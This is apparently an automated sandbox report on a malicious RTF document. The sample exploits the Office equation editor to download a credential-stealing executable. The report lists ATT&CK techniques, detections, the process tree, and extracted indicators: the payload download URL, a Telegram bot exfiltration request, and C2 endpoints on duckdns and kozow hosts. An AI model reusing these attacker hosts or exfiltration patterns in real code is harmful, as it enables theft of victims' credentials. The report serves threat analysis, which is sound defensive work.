                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                Execution: 1 Native API; 33 Exploitation for Client Execution; 1 Command and Scripting Interpreter; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Install Root Certificate; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 1 Modify Registry; 31 Virtualization/Sandbox Evasion; 111 Process Injection
                Credential Access: 1 OS Credential Dumping; 1 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                Discovery: 1 File and Directory Discovery; 13 System Information Discovery; 1 Security Software Discovery; 1 Query Registry; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; Network Service Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Screen Capture; 1 Email Collection; 1 Input Capture; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                Command and Control: 1 Web Service; 14 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 24 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                Behavior Graph (ID: 1558704, Sample: Xkl0PnD8zFPjfh1.wiz.rtf, Startdate: 19/11/2024, Architecture: WINDOWS, Score: 100)
                Sample signatures: Initial sample is an obfuscated RTF file; Suricata IDS alerts for network traffic; Found malware configuration; 25 other signatures
                WINWORD.EXE (started)
                  EQNEDT32.EXE (started)
                    Network: 87.120.84.39, 49161, 80, SHARCOM-ASBG, Bulgaria
                    Dropped: C:\Users\user\...\wealthcharliebgk.exe, PE32
                    Dropped: C:\Users\user\...\Xkl0PnD8zFPjfh1[1].exe, PE32
                    Signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                    wealthcharliebgk.exe (started)
                      Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
                      wealthcharliebgk.exe (started)
                        Network: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 8 other IPs or domains
                        Signatures: Installs new ROOT certificates; Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                      powershell.exe (started)
                  EQNEDT32.EXE (started)

                Source | Detection | Scanner | Label | Link
                Xkl0PnD8zFPjfh1.wiz.rtf | 45% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882 |
                Xkl0PnD8zFPjfh1.wiz.rtf | 100% | Avira | HEUR/Rtf.Malformed |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe | 100% | Avira | HEUR/AGEN.1306879 |
                C:\Users\user\AppData\Roaming\wealthcharliebgk.exe | 100% | Avira | HEUR/AGEN.1306879 |
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Roaming\wealthcharliebgk.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe | 32% | ReversingLabs | |
                C:\Users\user\AppData\Roaming\wealthcharliebgk.exe | 32% | ReversingLabs | |

                No Antivirus matches

                Source | Detection | Scanner | Label | Link
                http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exej | 0% | Avira URL Cloud | safe |
                http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exeC: | 0% | Avira URL Cloud | safe |
                http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exettC: | 0% | Avira URL Cloud | safe |
                http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exe | 0% | Avira URL Cloud | safe |

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                reallyfreegeoip.org | 188.114.97.3 | true | false | | high
                api.telegram.org | 149.154.167.220 | true | false | | high
                checkip.dyndns.com | 193.122.130.0 | true | false | | high
                checkip.dyndns.org | unknown | unknown | false | | high

                Name | Malicious | Antivirus Detection | Reputation
                https://reallyfreegeoip.org/xml/8.46.123.75 | false | | high
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2011/20/2024%20/%201:09:14%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                http://checkip.dyndns.org/ | false | | high
                http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exe | true | Avira URL Cloud: safe | unknown

                Name | Source | Malicious | Antivirus Detection | Reputation
                https://duckduckgo.com/chrome_newtab | wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/ac/?q= | wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf | wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034F8000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://api.telegram.org | wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://crl.entrust.net/server1.crl0 | wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://api.telegram.org/bot | wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
                https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i | wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://ocsp.entrust.net03 | wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exettC: | EQNEDT32.EXE, 00000002.00000002.360779526.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmp | false
                                                high
                                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.diginotar.nl/cps/pkioverheid0wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.orgwealthcharliebgk.exe, 00000008.00000002.876070304.0000000002483000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002562000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchwealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exejEQNEDT32.EXE, 00000002.00000002.360779526.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://reallyfreegeoip.org/xml/8.46.123.754wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://varders.kozow.com:8081wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.com/favicon.icowealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://aborters.duckdns.org:8081wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ac.ecosia.org/autocomplete?q=wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20awealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.google.com/sorry/indexwealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000350D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003567000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000361B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.google.com/search?q=wmfwealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://anotherarmy.dns.army:8081wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://checkip.dyndns.org/qwealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://reallyfreegeoip.orgwealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://reallyfreegeoip.orgwealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26awealthcharliebgk.exe, 00000008.00000002.876897343.00000000034F8000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.google.com/search?q=netwealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.google.com/sorry/indextestwealthcharliebgk.exe, 00000008.00000002.876897343.000000000351A000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003552000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000035CE000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003606000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://checkip.dyndns.comwealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://api.telegram.orgwealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://ocsp.entrust.net0Dwealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewealthcharliebgk.exe, 00000005.00000002.371713149.0000000002465000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://secure.comodo.com/CPS0wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exeC:EQNEDT32.EXE, 00000002.00000003.360572542.000000000067B000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.360779526.000000000067D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.entrust.net/2048ca.crl0wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedwealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://reallyfreegeoip.org/xml/wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
IP               Domain               Country         ASN    ASN Name            Malicious
132.226.8.169    unknown              United States   16989  UTMEMUS             false
149.154.167.220  api.telegram.org     United Kingdom  62041  TELEGRAMRU          false
188.114.97.3     reallyfreegeoip.org  European Union  13335  CLOUDFLARENETUS     false
87.120.84.39     unknown              Bulgaria        51189  SHARCOM-ASBG        true
188.114.96.3     unknown              European Union  13335  CLOUDFLARENETUS     false
193.122.130.0    checkip.dyndns.com   United States   31898  ORACLE-BMC-31898US  false
158.101.44.242   unknown              United States   31898  ORACLE-BMC-31898US  false
132.226.247.73   unknown              United States   16989  UTMEMUS             false
                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1558704
                                                                                                              Start date and time:2024-11-19 18:07:08 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 9m 11s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                              Number of analysed new started processes analysed:14
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:Xkl0PnD8zFPjfh1.wiz.rtf
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.expl.evad.winRTF@9/14@29/8
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 33.3%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 99%
                                                                                                              • Number of executed functions: 126
                                                                                                              • Number of non-executed functions: 130
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .rtf
                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                              • Attach to Office via COM
                                                                                                              • Active ActiveX Object
                                                                                                              • Scroll down
                                                                                                              • Close Viewer
                                                                                                              • Override analysis time to 76695.0518958658 for current running targets taking high CPU consumption
                                                                                                              • Override analysis time to 153390.103791732 for current running targets taking high CPU consumption
                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                              • Execution Graph export aborted for target EQNEDT32.EXE, PID 3600 because there are no executed function
                                                                                                              • Execution Graph export aborted for target wealthcharliebgk.exe, PID 3860 because it is empty
                                                                                                              • Not all processes were analyzed, report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • VT rate limit hit for: Xkl0PnD8zFPjfh1.wiz.rtf
                                                                                                              Time      Type             Description
                                                                                                              12:08:00  API Interceptor  281x Sleep call for process: EQNEDT32.EXE modified
                                                                                                              12:08:04  API Interceptor  9027303x Sleep call for process: wealthcharliebgk.exe modified
                                                                                                              12:08:08  API Interceptor  14x Sleep call for process: powershell.exe modified
                                                                                                                                  Bank Swift Copy 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 87.120.84.39
                                                                                                                                  blhbZrtqbLg6O1K.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 87.120.84.39
                                                                                                                                  Payment Copy.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 87.120.84.39
                                                                                                                                  2 Payment Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 87.120.84.39
                                                                                                                                  ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 87.120.84.38
